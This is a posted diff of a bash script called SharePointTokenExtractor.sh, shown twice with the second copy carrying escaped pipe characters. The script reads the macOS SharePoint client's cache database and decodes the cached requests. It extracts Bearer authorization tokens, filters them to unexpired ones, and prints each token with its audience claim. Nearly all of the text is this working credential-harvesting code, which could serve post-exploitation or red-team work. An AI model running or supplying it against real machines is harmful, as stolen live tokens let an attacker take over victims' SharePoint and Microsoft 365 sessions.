0xBruno · March 13, 2025 14:52
diff --git a/SharePointTokenExtractor.sh b/SharePointTokenExtractor.sh
 #!/bin/bash

 # Path to the SQLite database
 DB_PATH="/Users/EXAMPLEUSER/Library/Caches/com.microsoft.SharePoint-mac/Cache.db"

 # Sharepoint REST API docs
 # https://learn.microsoft.com/en-us/sharepoint/dev/sp-add-ins/get-to-know-the-sharepoint-rest-service?tabs=csom

 # Initialize an empty array to store tokens
 declare -a tokens

 # Query the database and process each hex record
 while read -r hexdata; do
    # Convert hex to binary and to JSON format
    json_data=$(echo "$hexdata" | xxd -r -p | plutil -convert json -o - - 2>/dev/null)
    
    # Check if json_data is a valid JSON object
    if echo "$json_data" | jq empty >/dev/null 2>&1; then
        # Extract Authorization token
        token=$(echo "$json_data" | jq -r '.. | objects | select(has("Authorization")) | .Authorization' | sed 's/^Bearer //')
        
        # If token exists, add it to the array
        if [ -n "$token" ]; then
            tokens+=("$token")
        fi
    fi
 done < <(sqlite3 "$DB_PATH" "SELECT hex(request_object) FROM cfurl_cache_blob_data")

 # Get unique tokens and sort them
 unique_tokens=($(printf "%s\n" "${tokens[@]}" | sort -u))

 # For each unique token, extract and display the token and aud claim
 for token in "${unique_tokens[@]}"; do
    payload=$(echo "$token" | cut -d '.' -f2)
 
    # Extract the epoch time
    exp_epoch=$(echo $payload | base64 -d | grep -o '"exp":[0-9]*' | awk -F: '{print $2}')

    # Get the current epoch time
    current_epoch=$(date +%s)

    # Compare the epoch times
    if [ "$exp_epoch" -gt "$current_epoch" ]; then
        echo $payload | base64 -d | grep -o '"aud":"[^"]*"'
        echo $token
        echo ""
        echo ""
        echo ""
        #echo "The exp time $exp_epoch is after or equal to the current time $current_epoch."
    fi


 done
	#!/bin/bash

	# Path to the SQLite database
	DB_PATH="/Users/EXAMPLEUSER/Library/Caches/com.microsoft.SharePoint-mac/Cache.db"

	# Sharepoint REST API docs
	# https://learn.microsoft.com/en-us/sharepoint/dev/sp-add-ins/get-to-know-the-sharepoint-rest-service?tabs=csom

	# Initialize an empty array to store tokens
	declare -a tokens

	# Query the database and process each hex record
	while read -r hexdata; do
	# Convert hex to binary and to JSON format
	json_data=$(echo "$hexdata" \| xxd -r -p \| plutil -convert json -o - - 2>/dev/null)

	# Check if json_data is a valid JSON object
	if echo "$json_data" \| jq empty >/dev/null 2>&1; then
	# Extract Authorization token
	token=$(echo "$json_data" \| jq -r '.. \| objects \| select(has("Authorization")) \| .Authorization' \| sed 's/^Bearer //')

	# If token exists, add it to the array
	if [ -n "$token" ]; then
	tokens+=("$token")
	fi
	fi
	done < <(sqlite3 "$DB_PATH" "SELECT hex(request_object) FROM cfurl_cache_blob_data")

	# Get unique tokens and sort them
	unique_tokens=($(printf "%s\n" "${tokens[@]}" \| sort -u))

	# For each unique token, extract and display the token and aud claim
	for token in "${unique_tokens[@]}"; do
	payload=$(echo "$token" \| cut -d '.' -f2)

	# Extract the epoch time
	exp_epoch=$(echo $payload \| base64 -d \| grep -o '"exp":[0-9]*' \| awk -F: '{print $2}')

	# Get the current epoch time
	current_epoch=$(date +%s)

	# Compare the epoch times
	if [ "$exp_epoch" -gt "$current_epoch" ]; then
	echo $payload \| base64 -d \| grep -o '"aud":"[^"]*"'
	echo $token
	echo ""
	echo ""
	echo ""
	#echo "The exp time $exp_epoch is after or equal to the current time $current_epoch."
	fi


	done
No results found